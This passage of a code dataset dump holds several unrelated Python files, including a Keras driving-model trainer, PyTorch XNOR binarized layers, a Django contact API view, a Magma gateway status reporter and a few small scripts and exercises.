activation='elu', init='he_normal', W_regularizer=weights_regularizer))\n    model.add(Dropout(.5))\n    model.add(Dense(1, activation='linear', init='he_normal'))\n\n    model.compile(optimizer='adam', loss='mse',metrics=['accuracy'])\n    model.summary()\n    return model\n
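# Note: this file uses the Keras 1.x layer API (Convolution2D with\n# subsample/init/W_regularizer); under Keras 2.x these correspond to Conv2D\n# with strides/kernel_initializer/kernel_regularizer.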
\ndef get_batch(X_train, y_train):\n    \"\"\"\n    Generate a batch for training from the data (X_train) and the corresponding ground truth.\n    X_train (names): center_img.strip(), left_img.strip(), right_img.strip()\n    y_train: angle, angle+steer_offset, angle-steer_offset\n    Returns: a list of images (filenames) and steering angles -> only for one batch\n    \"\"\"\n    imgList = np.zeros((BATCH_SIZE, 66, 200, 3), dtype=np.float32)\n    steeringAngleList = np.zeros((BATCH_SIZE,), dtype=np.float32)\n\n    while True:\n        for i in range(BATCH_SIZE):\n            lowAngle_counter = 0\n\n            # Get a valid angle (not a low angle when the percentage of low angles in the batch is already exceeded)\n            while True:\n                imgFileName, angle = getRandImgAndAngle(X_train,y_train)\n                if not validAngle(angle, lowAngle_counter, BATCH_SIZE):\n                    # Get new data -> this one is not working\n                    continue\n                else:\n                    # Fine. Increase and you shall pass ;)\n                    lowAngle_counter += 1\n                    break\n\n            # Read image\n            image = cv2.imread(imgFileName)\n            # Preprocess\n            image = preprocess(image)\n            # Flip the image (sometimes)\n            imgList[i],steeringAngleList[i]=flipImg(image,angle)\n\n        yield imgList, steeringAngleList\n\n\nif __name__==\"__main__\":\n    # Get the training data from the log file, shuffle, and split into train/validation datasets\n    X_train, X_validation, y_train, y_validation = get_data()\n\n    # Get model, print summary, and train using a generator\n    model = model_nvidia()\n    model.fit_generator(get_batch(X_train, y_train), samples_per_epoch=24000, nb_epoch=20, validation_data=get_batch(X_validation, y_validation), nb_val_samples=1024)#, callbacks=[early_stop])\n    \n    print('Training finished, model will be saved to model.h5 and model.json. Call python drive.py model.json to drive in autonomous mode.')\n    # Save weights to h5 and model architecture to json\n    model.save_weights('model.h5')\n    with open('model.json', 'w') as outfile:\n        json.dump(model.to_json(), outfile)\n\n    print('The End.')","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"131512936","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport array\nimport struct\nimport svgwrite\n\nclass SmakyFont(object):\n\tdef __init__(self, filename):\n\t\twith open(filename, \"rb\") as rawFile:\n\t\t\trawFile.read(256)\n\t\t\tself.__header = rawFile.read(256)\n\t\t\ttuples=struct.unpack(\">HBBHHBBBBHHHHHHH4BHHHH90s128s\", self.__header)\n\t\t\tself.__byteSize = tuples[3]\n\t\t\tself.__matrixHeight = tuples[4]\n\t\t\tself.__byteWidth = tuples[5]\n\t\t\tself.__leftMargin = tuples[6]\n\t\t\tself.firstGlyph = tuples[7]\n\t\t\tself.lastGlyph = tuples[8]\n\t\t\tself.__leftMargin = tuples[9]\n\t\t\t\n\t\t\tself.baseline=tuples[10]\n\t\t\tself.h1 = tuples[11]\n\t\t\tself.h2 = tuples[12]\n\t\t\tself.w = tuples[13]\n\t\t\t\n\t\t\tself.glyphCount = self.lastGlyph - self.firstGlyph+1\n\t\t\t\n\t\t\tself.__widths = array.array(\"B\", rawFile.read(self.glyphCount))\n\t\t\tself.__h1 = array.array(\"B\", rawFile.read(self.glyphCount))\n\t\t\tself.__h2 = array.array(\"B\", rawFile.read(self.glyphCount))\n\t\t\tself.__bitmaps=array.array(\"B\", rawFile.read(self.__byteSize * self.glyphCount))\n\t\n\tdef __getitem__(self, i):\n\t\tx = self.__bitmaps[self.__byteSize*i : self.__byteSize*(i+1)]\n\t\treturn SmakyGlyph(i+self.firstGlyph, x, self.__byteWidth, self.__leftMargin,\n\t\t\t\t\t self.__widths[i], self.__h1[i], self.__h2[i])\n \n\nclass SmakyGlyph(object):\n\tdef __init__(self, ascii, bitmap, byteWidth, margin, w, h1, h2):\n\t\tself.ascii = ascii \n\t\tself.bitmap = bitmap\n\t\tself.byteWidth = byteWidth\n\t\tself.margin=margin\n\t\tself.w = w\n\t\tself.h1 = h1\n\t\tself.h2 = h2\n\t\t\n\tdef print(self):\n\t\tprint(u\"Character {c} {w}x{h}\".format(c=chr(self.ascii), w=self.w, h=self.h1+self.h2))\n\t\tfor i in range(0, self.h1+self.h2):\n\t\t\trow = self.bitmap[i*self.byteWidth : (i+1)*self.byteWidth]\n\t\t\timage = \"\"\n\t\t\tfor j in range(0, self.w):\n\t\t\t\tbit = row[j >> 3] & (128 >> (j%8))\n\t\t\t\tif (bit):\n\t\t\t\t\timage = image + \"*\"\n\t\t\t\telse:\n\t\t\t\t\timage = image + \".\"\n\t\t\tprint(image)\n\t\t\t\t\t\t\t\nfont = SmakyFont(\"/Users/jmp/Archives/Smaky/Raw/systeme/sma_cap12.genc\")\nprint(\"{count} symbols, max dimensions {w}x{h}\"\n\t.format(count=font.glyphCount, h=font.h1+font.h2, w=font.w))\n\noutput = svgwrite.Drawing(\"output.svg\", profile=\"tiny\")\ndx = round(1024/max((font.h1+font.h2), font.w))\nfor i in range(font.firstGlyph, font.lastGlyph):\n\tox = 1024*(i%11)\n\toy = 1024*round(i/11)\n\tglyph = font[i]\n\tfor j in range(0, glyph.h1 + glyph.h2):\n\t\trow = glyph.bitmap[j*glyph.byteWidth : (j+1)*glyph.byteWidth]\n\t\tfor k in range(0, glyph.w):\n\t\t\tbit = row[k >> 3] & (128 >> (k%8))\n\t\t\tif bit:\n\t\t\t\toutput.add(output.rect(insert=(ox+dx*k, oy+dx*j), \n\t\t\t\t\t\t size=(round(0.9*dx), round(0.9*dx)), fill='black'))\noutput.save()\n\n\n","sub_path":"genc2svg.py","file_name":"genc2svg.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"475905311","text":"# -*- coding: utf-8 -*-\n# @Author: liusongwei\n# @Date: 2020-09-26 15:11:39\n# @Last Modified by: liusongwei\n# @Last Modified time: 2020-10-12 01:07:24\n\nimport torch \nimport torch.nn as nn \nimport torch.autograd.function as Function\nimport torch.nn.functional as F\nimport binaryfunction\n\n\n\nclass XNORConv2d_1w1a(nn.Conv2d):\n    '''\n    XNOR 1w1a conv2d layers\n    '''\n    def __init__(self,in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=False):\n        super(XNORConv2d_1w1a, self).__init__(in_channels,out_channels,\n            kernel_size=kernel_size,stride=stride,padding=padding,\n            dilation=dilation,groups=groups,bias=bias)\n\n    def forward(self, input):\n\n        # w_b = a * sign(w)\n        bw = binaryfunction.BinaryFunc().apply(self.weight)\n        scale_b = torch.mean(torch.abs(self.weight),dim=[1,2,3],keepdim=True).detach()\n        #scale_b = self.weight.abs().view(self.weight.size(0), -1).mean(-1).view(self.weight.size(0),1,1,1).detach()\n        scale_bw = bw * scale_b\n        # input_b = sign(input)\n        binput = binaryfunction.BinaryFunc().apply(input)\n        boutput = F.conv2d(binput, scale_bw,bias=self.bias,\n            stride=self.stride, padding=self.padding,\n            dilation=self.dilation,groups=self.groups)\n        # Compute the output scale feature map:\n        # equal to the scaling factor for each activation value of the convolution block\n        os = self.getScaleFeatureMap(input)\n        os = os.detach()\n        output = boutput * os\n        return output\n\n\n    def getScaleFeatureMap(self,input):\n        # N C H W --> N 1 H W\n        # Compute channel abs mean\n        input_mean = torch.mean(torch.abs(input),dim=1,keepdim=True)\n        # N 1 H W ---> N 1 H` W`\n        # Calculate the plane mean for each convolution block by convolution\n        kernel = torch.ones((1,1,self.kernel_size[0],self.kernel_size[1])).to(input.device)\n        kernel.data.mul_(1 / (self.kernel_size[0] *self.kernel_size[1]))\n        input_mean = F.conv2d(input_mean, kernel, \n            stride=self.stride, padding=self.padding,\n            dilation=self.dilation,groups=self.groups)\n        return input_mean\n\n\n\nclass XNORDense_1w1a(nn.Linear):\n    def __init__(self,in_features,out_features,bias=True):\n        super(XNORDense_1w1a, self).__init__(in_features,out_features,bias=bias)\n\n    def forward(self, input):\n        # w_b = a * sign(w)\n        # dim(w)=DimIn*DimOUT dim(a)= 1*DimOUT\n        bw = binaryfunction.BinaryFunc().apply(self.weight)\n        scale_b = self.weight.abs().mean(0).view(1,self.weight.size(1)).detach()\n        scale_bw = bw * scale_b\n        # input_b = sign(input)\n        # dim(input) = N*DimIn\n        binput = binaryfunction.BinaryFunc().apply(input)\n        # dim(a_input) = Nx1\n        si = torch.mean(torch.abs(input),dim=1,keepdim=True).detach()\n        scale_binput = binput * si\n        output = F.linear(input=scale_binput, weight=scale_bw, bias=self.bias)\n        return output\n\n\n\n\nclass XNORConv2d_1w32a(nn.Conv2d):\n    '''\n    XNOR 1w32a conv2d layers\n    '''\n    def __init__(self,in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=False):\n        super(XNORConv2d_1w32a, self).__init__(in_channels,out_channels,\n            kernel_size=kernel_size,stride=stride,padding=padding,\n            dilation=dilation,groups=groups,bias=bias)\n\n    def forward(self, input):\n\n        # w_b = a * sign(w)\n        bw = binaryfunction.BinaryFunc().apply(self.weight)\n        scale_b = torch.mean(torch.abs(self.weight),dim=[1,2,3],keepdim=True).detach()\n        #scale_b = self.weight.abs().view(self.weight.size(0), -1).mean(-1).view(self.weight.size(0),1,1,1).detach()\n        scale_bw = bw * scale_b\n        boutput = F.conv2d(input, scale_bw,bias=self.bias,\n            stride=self.stride, padding=self.padding,\n            dilation=self.dilation,groups=self.groups)\n\n        return boutput\n
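# Minimal usage sketch (illustrative, not part of the original module):\n# conv = XNORConv2d_1w32a(3, 16, kernel_size=3, padding=1)\n# y = conv(torch.randn(1, 3, 32, 32))  # binarized weights, full-precision activations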
\n\nclass XNORDense_1w32a(nn.Linear):\n    def __init__(self,in_features,out_features,bias=True):\n        super(XNORDense_1w32a, self).__init__(in_features,out_features,bias=bias)\n\n    def forward(self, input):\n        # w_b = a * sign(w)\n        # dim(w)=DimIn*DimOUT dim(a)= 1*DimOUT\n        bw = binaryfunction.BinaryFunc().apply(self.weight)\n        scale_b = self.weight.abs().mean(0).view(1,self.weight.size(1)).detach()\n        scale_bw = bw * scale_b\n        output = F.linear(input=input, weight=scale_bw, bias=self.bias)\n        return output\n\n\n\nif __name__ == '__main__':\n\n    testdata = torch.ones((3,1,3,3),requires_grad=True)\n    testdata = testdata * torch.tensor([-2,-0.5,0.5]).unsqueeze(1).unsqueeze(2).unsqueeze(3).expand_as(testdata)\n\n    conv1=XNORConv2d_1w1a(1,1,kernel_size=3,stride=1,padding=1)\n    output=conv1(testdata)\n\n    weight = torch.ones(output.size())\n    grad = torch.autograd.grad(outputs=output,inputs=testdata,grad_outputs=weight)\n    print(grad[0])\n\n\n\n\n","sub_path":"network_quantize/XNOR/xnor_layers.py","file_name":"xnor_layers.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"468817569","text":"import playhand\r\n\r\ndef main():\r\n    #print (\"Welcome to the COSC 1336 collaborative \\\r\n    #    blackjack simulation thingy\")\r\n    PlayAgain = \"Y\"\r\n    wins = 0\r\n    losses = 0\r\n    while (PlayAgain == \"Y\"):\r\n        if (playhand.PlayHand()):\r\n            wins += 1\r\n        else:\r\n            losses += 1\r\n        PlayAgain = input(\"\\nPlay again? (Y/N) \").upper()\r\n\r\n    print('\\n\\nYou won',wins,'hands and lost',losses,'hands.')\r\n    input('')\r\n\r\nmain()\r\n","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"535290590","text":"#Target Marbles\n\nq = [int(x) for x in input().split()]\nn = q[0]\nt = q[1]\na = [int(x) for x in input().split()]\n\nsum = 0 \nls = []\nfor i in a:\n    #print('val: ',i)\n    if sum == t:\n        break;\n    elif sum>t:\n        sum = i\n        ls.clear()\n        ls.append(i)\n    else:\n        sum += i;\n        ls.append(i)\n    \n#print(sum)\nif sum == t:\n    print('true')\n    s = ''\n    for i in ls:\n        if len(s)>0:\n            s = s +' '+str(i)\n        else:\n            s = str(i)\n    print(s)\nelse:\n    print('false')\n","sub_path":"DS/ARRAYS/array_problems.py","file_name":"array_problems.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"578772267","text":"from B14.Car import B14\nfrom CnAy.Plot import make_plot\nfrom CnAy.SteeringFunctions import BasicSteeringFunction, AntiAckermanB14, AntiAckermanB14RearWheelSteering\nfrom TireModel import tire_func\nimport numpy as np\n\ndef tire_func_b(x, y):\n    return tire_func(x, y)\n\ndefault_params = {'a_x': 0.0,  # g's\n                  'toe_in_front': 0.0,  # degrees\n                  'toe_in_rear': 0.0,  # degrees\n                  'wheelbase': B14.wheels.wheel_base_m,  # meters\n                  'track_front': B14.wheels.track_width_f_m,  # meters\n                  'track_rear': B14.wheels.track_width_r_m,  # meters'\n                  'cg_height': B14.cg_z_m,  # meters\n                  'car_lbs': B14.weight_lb,  # lbs\n                  'driver_lbs': 150,  # lbs\n                  'percent_rear_weight': 0.53,\n                  'v_nom': 25.0,  # m / s\n                  'lltd': 0.5,\n                  'steer_func': AntiAckermanB14(),\n                  'tire_func': tire_func}\n\n# for testing new features\nmake_plot(default_params, percent_rear_weight=np.linspace(0.5, 1.0, endpoint=True, num=11))\n\n# huge batch job, takes at least an hour\n#make_plot(default_params,\n#          LLTD=np.linspace(0.00, 1.00, endpoint=True, num=101),\n#
percent_rear_weight=np.linspace(0.01, 0.99, endpoint=True, num=99),\n# car_lbs=np.linspace(260, 400, endpoint=True, num=40),\n# toe_in_front=np.linspace(-2, 2, endpoint=True, num=41),\n# toe_in_rear=np.linspace(-2, 2, endpoint=True, num=41),\n# track_front=np.linspace(0.1, 2.0, endpoint=True, num=39),\n# track_rear=np.linspace(0.1, 2.0, endpoint=True, num=39),\n# wheelbase=np.linspace(0.1, 2.3, endpoint=True, num=45),\n# )\n#\n\n","sub_path":"LapSim-master_python/CnAy/RunSuite.py","file_name":"RunSuite.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"487262068","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWe open a new book\n\"\"\"\n\nimport xlwings as xw\nimport datetime as dt\n\npath_01 = r\"C:\\GitHub\\learning_python\\xUdemy_xlwings\\S2_FirstSteps\\Test2.xlsx\"\n\nwb = xw.Book(path_01)\nsheet0= wb.sheets[0]\nsheet0.range(\"A1\").name = \"celdaA1\"\nprint(sheet0.range(\"A1\").name)\n\nsheet0.range(\"celdaA1\").value = \"esta es la celda A1\"\n\n\n#wb.close()\n","sub_path":"xUdemy_xlwings/S2_FirstSteps/S2_13_RangeNames_01.py","file_name":"S2_13_RangeNames_01.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"194298579","text":"# a parser which allows excluding imitations\r\nimport xml.etree.ElementTree as ET\r\n\r\ndef age_transform(metadata):\r\n '''transform age from years to months'''\r\n ageday = 0\r\n for i in metadata: # get the location of 'Y', 'M', 'D'\r\n if i == 'Y':\r\n loc_Y = metadata.index(i)\r\n elif i == 'M':\r\n loc_M = metadata.index(i)\r\n elif i == 'D':\r\n loc_D = metadata.index(i)\r\n for i in metadata: # get the number before 'Y', 'M', and 'D'\r\n if i == 'Y':\r\n age_year = int(metadata[loc_Y - 1])\r\n elif i == 'M':\r\n age_month = int(metadata[loc_Y + 1: loc_M])\r\n elif i == 'D':\r\n age_day = int(metadata[loc_M + 1: loc_D])\r\n if age_day >= 15:\r\n ageday = 1\r\n else:\r\n ageday = 0\r\n age_transformed = age_year * 12 + age_month + ageday\r\n return age_transformed\r\n\r\ndef age(fname):\r\n '''get the child's age from the file'''\r\n tree = ET.ElementTree(file=fname)\r\n root = tree.getroot()\r\n participant = root[0][0].attrib\r\n child_age = participant['age']\r\n return age_transform(child_age)\r\n\r\ndef sent(child_child, sent_list): # ???need to keep words starting with 'g'. But unable to read with child.text. 
solved\r\n    #print(sent_list)\r\n    if child_child.tag[-1] == 'w':\r\n        sent_list.append(child_child.text)\r\n        #print(sent_list)\r\n    return sent_list\r\n\r\n\r\ndef speaker(child):\r\n    '''get the speaker of the individual sentence'''\r\n    who_dict = child.attrib\r\n    who = who_dict['who']\r\n    return who\r\n\r\ndef uid(child):\r\n    '''get the int of the uid of the individual sentence'''\r\n    uid_dict = child.attrib\r\n    uID = int(uid_dict['uID'][1:])\r\n    return uID\r\n\r\ndef sents(fname):\r\n    '''[speaker, uid, [sent]]'''\r\n    all_sents = []\r\n    tree = ET.ElementTree(file=fname)\r\n    root = tree.getroot()\r\n    for child in root:\r\n        if 'who' in child.attrib:\r\n            sents = []\r\n            sent_list = []\r\n            sents.extend((speaker(child), uid(child)))\r\n            for child_child in child:\r\n                if child_child.tag[-1] == 'g':\r\n                    for child3 in child_child:\r\n                        sent(child3, sent_list)\r\n                    #print(uid(child), child_child.tag, child_child.attrib, child_child.text)\r\n                else:\r\n                    sent(child_child, sent_list)\r\n            sents.append(sent_list)\r\n            all_sents.append(sents)\r\n    return all_sents\r\n\r\ndef test(fname):\r\n    print(sents(fname))\r\n#test('e:/project/Manchester/anne/anne01a.xml')\r\n\r\n","sub_path":"new_parser.py","file_name":"new_parser.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"610184649","text":"\"\"\"This module contains contact view with methods for CRUD operations\"\"\"\n\nimport json\n\nfrom django.http import JsonResponse, HttpResponse\nfrom django.views.generic.base import View\nfrom django.shortcuts import render\n\nfrom contact.models import Contact\nfrom contact.utils.verify_email import send_verification_email\nfrom moninag.settings import DEFAULT_FROM_EMAIL, DEFAULT_HOST\nfrom registration.utils.send_email import generate_activation_key\nfrom utils.validators import validate_dict, validate_email, validate_subdict\n\nREQUIREMENTS = {\n    'first_name',\n    'second_name',\n    'email'\n}\n\n\nclass ContactView(View):\n    \"\"\"Contact view handles GET, POST, PUT, DELETE requests.\"\"\"\n\n    def get(self, request, contact_id=None):\n        \"\"\"Handles GET request.\n        If contact_id is None, return json response with all contacts,\n        otherwise contact with given id.\n        If contact with specified id was not found return error.\n        :param contact_id: int - contact id\n        :return: JsonResponse:\n        {\n            response: <contact or list of contacts>\n            or\n            error: <error message>\n        }\n        \"\"\"\n\n        json_response = {}\n\n        if not contact_id:\n            contacts = Contact.get_by_user_id(request.user.id)\n            json_response['response'] = [contact.to_dict()\n                                         for contact in contacts]\n            return JsonResponse(json_response, status=200)\n\n        contact = Contact.get_by_id(contact_id)\n\n        if not contact:\n            json_response['error'] = 'Contact with specified id was not found.'\n            return JsonResponse(json_response, status=404)\n\n        if not contact.user.id == request.user.id:\n            return HttpResponse(status=403)\n\n        json_response['response'] = contact.to_dict()\n\n        return JsonResponse(json_response, status=200)\n\n    def post(self, request):\n        \"\"\"Handles POST request.\n        Get contact data from POST request and create one in database.\n        In response return created contact or error if contact was not created.\n        Require JSON with fields:\n        {\n            'first_name': <str>,\n            'second_name': <str>,\n            'email': <str>\n        }\n        :return: JsonResponse:\n        {\n            response: <created contact>\n            or\n            error: <error message>\n        }\n        \"\"\"\n\n        json_response = {}\n\n        contact_params = json.loads(request.body.decode('utf-8'))\n\n        if not validate_dict(contact_params, REQUIREMENTS):\n            json_response['error'] = 'Incorrect JSON format.'\n            return JsonResponse(json_response, status=400)\n
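        # Illustrative body that passes the check above (field names from REQUIREMENTS):\n        # {\"first_name\": \"Ada\", \"second_name\": \"Lovelace\", \"email\": \"ada@example.com\"}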
\n        email = contact_params.get('email').lower()\n\n        if not validate_email(email):\n            json_response['error'] = 'Invalid email format.'\n            return JsonResponse(json_response, status=400)\n\n        contact = Contact.get_by_email(email)\n\n        if contact:\n            json_response['error'] = 'User with such email already exists.'\n            return JsonResponse(json_response, status=400)\n\n        else:\n            contact = Contact()\n\n        contact.first_name = contact_params['first_name']\n        contact.second_name = contact_params['second_name']\n        contact.email = email\n        contact.user = request.user\n        activation_key = generate_activation_key(email)\n        contact.activation_key = activation_key\n        contact.save()\n\n        send_verification_email(\n            DEFAULT_HOST, DEFAULT_FROM_EMAIL, contact.email, activation_key)\n\n        json_response['response'] = contact.to_dict()\n        return JsonResponse(json_response, status=201)\n\n    def verify(request, activation_key):  # pylint: disable=no-self-argument\n        \"\"\"Making contact active (active=False -> active=True)\"\"\"\n\n        contact = Contact.objects.get(activation_key=activation_key)\n        contact.is_active = True\n        contact.save()\n\n        return render(request, 'contact/verified.html')\n\n    def put(self, request, contact_id):  # pylint: disable=no-self-use\n        \"\"\"Handles PUT request.\n        Get contact data from PUT request and update contact with given id in database.\n        In response return updated contact or error if contact was not updated.\n        :param contact_id: contact id\n        :return: JsonResponse:\n        {\n            response: <updated contact>\n            or\n            error: <error message>\n        }\n        \"\"\"\n\n        json_response = {}\n\n        contact_params = json.loads(request.body.decode('utf-8'))\n\n        if not validate_subdict(contact_params, REQUIREMENTS):\n            json_response['error'] = 'Incorrect JSON format.'\n            return JsonResponse(json_response, status=400)\n\n        if 'email' in contact_params:\n            email = contact_params.get('email').lower()\n            if not validate_email(email):\n                json_response['error'] = 'Invalid email format.'\n                return JsonResponse(json_response, status=400)\n\n        contact = Contact.get_by_id(contact_id)\n\n        if not contact:\n            json_response['error'] = 'Contact was not found.'\n            return JsonResponse(json_response, status=404)\n\n        if not request.user.id == contact.user.id:\n            return HttpResponse(status=403)\n\n        contact.update(**contact_params)\n        json_response['response'] = contact.to_dict()\n        return JsonResponse(json_response, status=200)\n\n    def delete(self, request, contact_id):  # pylint: disable=no-self-use\n        \"\"\"Handles DELETE request.\n        Delete contact with given id from database.\n        :param contact_id: int - contact id\n        :return: HttpResponse: Status 200 for success, 403 otherwise.\n        \"\"\"\n\n        contact = Contact.get_by_id(contact_id)\n\n        if contact:\n            if contact.user.id == request.user.id:\n                contact.delete()\n                return HttpResponse(status=200)\n            else:\n                return HttpResponse(status=403)\n\n        return HttpResponse(status=404)\n","sub_path":"moninag/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"447624487","text":"\"\"\"\nCopyright (c) 2016-present, Facebook, Inc.\nAll rights reserved.\n\nThis source code is licensed under the BSD-style license found in the\nLICENSE file in the root directory of this source tree. An additional grant
An additional grant\nof patent rights can be found in the PATENTS file in the same directory.\n\"\"\"\n\nimport json\nimport logging\nimport psutil\nimport platform\nimport time\nimport netifaces\nfrom typing import (\n NamedTuple,\n List,\n Any,\n Dict,\n)\nfrom magma.common.misc_utils import (\n get_ip_from_if,\n is_interface_up,\n get_all_ips_from_if_cidr,\n get_if_mac_address,\n IpPreference,\n)\nfrom magma.common.service import MagmaService\nfrom magma.magmad.check.machine_check.cpu_info import (\n get_cpu_info,\n)\nfrom magma.magmad.check.network_check.routing_table import (\n get_routing_table,\n)\n\n\nGatewayStatus = NamedTuple(\n 'GatewayStatus',\n [('machine_info', Dict[str, Any]), ('meta', Dict[str, str]),\n ('platform_info', Dict[str, Any]), ('system_status', Dict[str, Any])])\n\nSystemStatus = NamedTuple(\n 'SystemStatus',\n [('time', int), ('uptime_secs', int), ('cpu_user', int),\n ('cpu_system', int), ('cpu_idle', int), ('mem_total', int),\n ('mem_available', int), ('mem_used', int), ('mem_free', int),\n ('swap_total', int), ('swap_used', int), ('swap_free', int),\n ('disk_partitions', List[Dict[str, Any]])])\n\nPlatformInfo = NamedTuple(\n 'PlatformInfo',\n [('vpn_ip', str), ('packages', List[Dict[str, Any]]),\n ('kernel_version', str), ('kernel_versions_installed', List[str]),\n ('config_info', Dict[str, Any])])\n\nMachineInfo = NamedTuple(\n 'MachineInfo',\n [('cpu_info', Dict[str, Any]), ('network_info', Dict[str, Any])])\n\nNetworkInfo = NamedTuple(\n 'NetworkInfo',\n [('network_interfaces', List[Dict[str, Any]]),\n ('routing_table', List[Dict[str, Any]])])\n\nDiskPartition = NamedTuple(\n 'DiskPartition',\n [('device', str), ('mount_point', str), ('total', int), ('used', int),\n ('free', int)])\n\nConfigInfo = NamedTuple(\n 'ConfigInfo',\n [('mconfig_created_at', int)])\n\nPackage = NamedTuple(\n 'Package',\n [('name', str), ('version', str)])\n\nCPUInfo = NamedTuple(\n 'CPUInfo',\n [('core_count', int), ('threads_per_core', int), ('architecture', str),\n ('model_name', str)])\n\nNetworkInterface = NamedTuple(\n 'NetworkInterface',\n [('network_interface_id', str), ('mac_address', str),\n ('ip_addresses', List[str]), ('status', str),\n ('ipv6_addresses', List[str])]\n)\n\nRoute = NamedTuple(\n 'Route',\n [('destination_ip', str), ('gateway_ip', str),\n ('genmask', str), ('network_interface_id', str)])\n\n\nclass GatewayStatusNative:\n def __init__(self, service: MagmaService):\n self._service = service\n self._kernel_version = platform.uname().release\n self._boot_time = psutil.boot_time()\n cpu_info = get_cpu_info()\n if cpu_info.error is not None:\n logging.error('Failed to get cpu info: %s', cpu_info.error)\n self._cpu_info = CPUInfo(\n core_count=cpu_info.core_count,\n threads_per_core=cpu_info.threads_per_core,\n architecture=cpu_info.architecture,\n model_name=cpu_info.model_name,\n )\n\n def make_status(\n self,\n service_statusmeta: Dict[str, Any],\n kernel_versions_installed: List[str]) -> str:\n system_status = self._system_status_tuple()._asdict()\n platform_info = \\\n self._get_platform_info_tuple(kernel_versions_installed)._asdict()\n machine_info = self._get_machine_info_tuple()._asdict()\n\n gw_status = GatewayStatus(\n machine_info=machine_info,\n platform_info=platform_info,\n system_status=system_status,\n meta={},\n )\n for statusmeta in service_statusmeta.values():\n gw_status.meta.update(statusmeta)\n\n return json.dumps(gw_status._asdict())\n\n def _system_status_tuple(self) -> SystemStatus:\n cpu = psutil.cpu_times()\n mem = 
psutil.virtual_memory()\n swap = psutil.swap_memory()\n\n def partition_gen():\n for partition in psutil.disk_partitions():\n usage = psutil.disk_usage(partition.mountpoint)\n yield DiskPartition(\n device=partition.device,\n mount_point=partition.mountpoint,\n total=usage.total,\n used=usage.used,\n free=usage.free,\n )\n\n system_status = SystemStatus(\n time=int(time.time()),\n uptime_secs=int(time.time() - self._boot_time),\n cpu_user=int(cpu.user * 1000), # convert second to millisecond\n cpu_system=int(cpu.system * 1000),\n cpu_idle=int(cpu.idle * 1000),\n mem_total=mem.total,\n mem_available=mem.available,\n mem_used=mem.used,\n mem_free=mem.free,\n swap_total=swap.total,\n swap_used=swap.used,\n swap_free=swap.free,\n disk_partitions=[partition._asdict() for partition in\n partition_gen()],\n )\n return system_status\n\n def _get_platform_info_tuple(\n self, kernel_versions: List[str]) -> PlatformInfo:\n try:\n gw_ip = get_ip_from_if('tun0') # look for tun0 interface\n except ValueError:\n gw_ip = 'N/A'\n\n mconfig_metadata = self._service.mconfig_metadata\n\n platform_info = PlatformInfo(\n vpn_ip=gw_ip,\n packages=[\n Package(\n name='magma',\n version=self._service.version,\n )._asdict(),\n ],\n kernel_version=self._kernel_version,\n kernel_versions_installed=kernel_versions,\n config_info=ConfigInfo(\n mconfig_created_at=mconfig_metadata.created_at,\n )._asdict(),\n )\n return platform_info\n\n def _get_machine_info_tuple(self) -> MachineInfo:\n machine_info = MachineInfo(\n cpu_info=self._cpu_info._asdict(),\n network_info=self._get_network_info_tuple()._asdict(),\n )\n return machine_info\n\n def _get_network_info_tuple(self) -> NetworkInfo:\n def network_interface_gen():\n for interface in netifaces.interfaces():\n try:\n mac_address = get_if_mac_address(interface)\n except ValueError:\n mac_address = None\n\n try:\n ip_addresses = get_all_ips_from_if_cidr(\n interface, IpPreference.IPV4_ONLY)\n except ValueError:\n ip_addresses = []\n\n try:\n ipv6_addresses = get_all_ips_from_if_cidr(\n interface, IpPreference.IPV6_ONLY)\n except ValueError:\n ipv6_addresses = []\n\n yield NetworkInterface(\n network_interface_id=interface,\n status=\"UP\" if is_interface_up(interface) else \"DOWN\",\n mac_address=mac_address,\n ip_addresses=ip_addresses,\n ipv6_addresses=ipv6_addresses,\n )\n\n def make_route_tuple(route) -> Route:\n return Route(\n destination_ip=route.destination,\n gateway_ip=route.gateway,\n genmask=route.genmask,\n network_interface_id=route.interface,\n )\n\n routing_cmd_result = get_routing_table()\n if routing_cmd_result.error is not None:\n logging.error(\"Failed to get routing table: %s\",\n routing_cmd_result.error)\n\n network_info = NetworkInfo(\n network_interfaces=[\n network_interface._asdict() for network_interface in\n network_interface_gen()],\n routing_table=[\n make_route_tuple(route)._asdict() for\n route in routing_cmd_result.routing_table],\n )\n return network_info\n","sub_path":"orc8r/gateway/python/magma/magmad/gateway_status.py","file_name":"gateway_status.py","file_ext":"py","file_size_in_byte":8147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"547953381","text":"import os\nimport boto\nimport io\nfrom boto.s3.key import Key\n\nAWS_ACCESS_KEY = os.environ['NB_S3_ACCESS_KEY'] #config.get('S3', 'AccessKey')\nAWS_SECRET_ACCESS_KEY = os.environ['NB_S3_SECRET_KEY'] #config.get('S3', 'SecretKey')\nS3_BUCKET = os.environ['NB_S3_BUCKET'] #config.get('S3', 'Bucket')\n\n\"\"\"\nTaken from 
